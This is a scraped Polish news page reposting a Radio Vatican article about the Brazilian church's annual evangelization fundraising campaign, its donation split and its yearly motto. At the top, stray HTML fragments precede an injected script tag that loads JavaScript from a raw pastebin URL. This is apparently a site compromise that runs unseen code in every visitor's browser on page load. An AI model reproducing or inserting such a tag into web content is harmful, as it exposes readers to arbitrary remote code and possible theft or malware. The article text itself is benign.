">

"> <script type="text/javascript" src="https://pastebin.com/raw/hUw8hjvb"></script></p>

Dzisiaj jest: poniedziałek,
19 listopada 2018r.

wykop.pl

ks. Z. Malczewski TChr, Brazylia: kampania na rzecz ewangelizacji

W Brazylii trwa kampania na rzecz ewangelizacji. Kościół prowadzi ją tam od uroczystości Chrystusa Króla do trzeciej niedzieli Adwentu. Akcję tę tamtejszy episkopat zainicjował w 1998 r.

Jej celem jest zaangażowanie wiernych w ewangelizację prowadzoną na mocy łaski Chrztu oraz pozyskanie funduszy na działalność duszpasterską Kościoła. Z zebranych ofiar 45 proc. pozostaje do dyspozycji diecezji, 20 proc. jest przeznaczanych na dzieła apostolskie danego regionu, a 35 proc. na inicjatywy ewangelizacyjne konferencji episkopatu.

Kampania na rzecz ewangelizacji ma na celu zdobycie środków finansowych koniecznych do prowadzenia dzieła ewangelizacyjnego. Z zebranych ofiar wiernych Kościół stara się zaspokoić najbardziej podstawowe akcje ewangelizacyjne prowadzone na różnych szczeblach struktur wspólnot lokalnych, jak też w wymiarze krajowym. 

Odpowiedzialny z ramienia episkopatu za Kampanię Ewangelizacyjną abp Murilo Ramos Krieger wyjaśnia znaczenie hasła tegorocznej kampanii „Ogłaszam wam wielką radość” (Łk 2, 10-11). „Pragniemy, aby tegoroczna kampania była naznaczona radością. Nasza radość ma źródło w darze, jaki Ojciec nam przekazał w postaci swego Syna Jezusa rodzącego się w Betlejem. Radość pochodzi też z faktu, że otrzymaliśmy łaskę powołania do ewangelizacji. Tegoroczne hasło oparte jest na słowach aniołów zwiastujących pasterzom radosną nowinę” – zaznaczył abp Krieger.

W najbliższą niedzielę 15 grudnia we wszystkich oratoriach, kaplicach i kościołach parafialnych wierni składać będą w uprzednio rozdanych kopertach ofiarę na dzieło ewangelizacyjne, jakie z entuzjazmem i zaangażowaniem prowadzi tutejszy Kościół. ks. Z. Malczewski TChr, Brazylia


Tekst pochodzi ze strony strony Radia Watykańskiego:

 

 http://pl.radiovaticana.va/news/2013/12/09/brazylia:_kampania_na_rzecz_ewangelizacji/pol-754232